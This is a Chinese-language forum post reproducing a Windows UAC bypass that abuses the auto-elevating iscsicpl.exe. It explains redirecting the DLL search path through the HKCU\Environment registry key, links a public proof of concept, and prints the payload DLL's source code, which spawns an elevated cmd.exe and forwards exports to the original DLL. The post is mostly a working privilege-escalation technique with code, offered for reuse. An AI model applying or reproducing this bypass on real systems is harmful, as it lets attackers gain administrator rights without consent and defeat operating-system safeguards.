Jump to content

iscsicpl.exe ByPassUac复现


Recommended Posts


  • Group:  Moderators
  • Content Count:  421
  • Achievement Points:  2,500
  • With Us For:  28 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

前言

上午在推特逛街,看到了个这个bypassuac。复现了一下,写个笔记

正文

lnk:https://www.ddosi.org/iscsicpl-bypassuac/
poc:https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC/archive/refs/heads/main.zip

j4DSQ1.png

c:\Windows\syswow64\iscsicpl.exe缺少iscsiexe.dll和iscsiexe_org.dll

j4Dpsx.png

j4D9L6.png

sigcheck检测,autoElevate为true。进程权限自提升

j4DFoD.png

翻看代码,作者修改了注册表的HKEY_CURRENT_USER\Environment Path的键值为当前用户的TMP目录。看了一下这个注册表的键值和PATH环境变量最后一个路径对应,修改该注册表相当于直接动环境变量路径最后一个路径
HKEY_CURRENT_USER\Environment注册表路径参考链接:https://baike.baidu.com/item/%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F/1730949
(当然也可以直接修改windir环境变量,然后dll丢到对应目录)

j4DAFe.png

j4DeSA.png

重复说一下DLL加载顺序

j4DmQI.png

直接加载iscsiexe.dl,会报缺少来自iscsiexe_org.dll的SvchostPushServiceGlobals、ServiceMain、DiscpEstablishServiceLinkage外部导出函数。

j4Dnyt.png

github上poc的dll code
(DLL外部函数转发)

// iscsiexe.cpp, the payload DLL executed by iscsicpl.exe
#include "pch.h"
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include "resource.h"
#pragma pack(1)
// LoadString() for linker
#pragma comment(lib,"User32.lib")
#define MAX_ENV_SIZE 32767
BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID  lpReserved)
{
    static HINSTANCE hL;
    LPWSTR pCMD = new WCHAR[MAX_ENV_SIZE];
    char pACMD[MAX_ENV_SIZE];
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
              WinExec("C:\\Windows\\System32\\cmd.exe", SW_SHOW);
        //hL = LoadLibrary(_T(".\\iscsiexe_org.dll"));
              /*
        if (!hL)
            return false;
        // execute the command string from the module resource section
        LoadString(GetModuleHandle(L"iscsiexe.dll"), IDS_CMD101, pCMD,  MAX_ENV_SIZE);
        WideCharToMultiByte(CP_ACP, 0, pCMD, wcslen(pCMD), pACMD, MAX_ENV_SIZE,  NULL, NULL);
        WinExec(pACMD, SW_SHOW);
              */
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        FreeLibrary(hL);
        break;
    }
    return TRUE;
}
// the proxy DLL mappings for the linker
#pragma comment(linker,  "/export:SvchostPushServiceGlobals=iscsiexe_org.SvchostPushServiceGlobals")
#pragma comment(linker, "/export:ServiceMain=iscsiexe_org.ServiceMain")
#pragma comment(linker,  "/export:DiscpEstablishServiceLinkage=iscsiexe_org.DiscpEstablishServiceLinkage")

原作者iscsiexe_org.dll生成过程(搞的和他妈自解压马一样,醉了)

* 利用FindResource函数搜索当前进程搜索DLL资源,寻找102资源获取句柄
* LoadResource搜索对应资源获取句柄
* SizeofResource检索指定资源的大小
* LockResource检索指向内存中指定资源的指针
* 然后遍历对应DLL资源,改名为 iscsiexe_org.dll

VT查杀:https://www.virustotal.com/gui/file/60004318d9a509e5bad2bda71dd11bcc0304dabe17b30a85366a73ad532aae80
稍微搜了一下,dll可能是这里下的:https://www.dll-files.com/iscsiexe.dll.html

j4Df0K.png

j4DqXt.png

j4DhTO.png

j4DIte.png

j4D7pd.png

j4DuOP.png

win7测试

j4DMef.png

win10测试

j4DQw8.png

Link to comment
Share on other sites


  • Group:  Members
  • Content Count:  414
  • Achievement Points:  2,485
  • With Us For:  47 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

6

Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...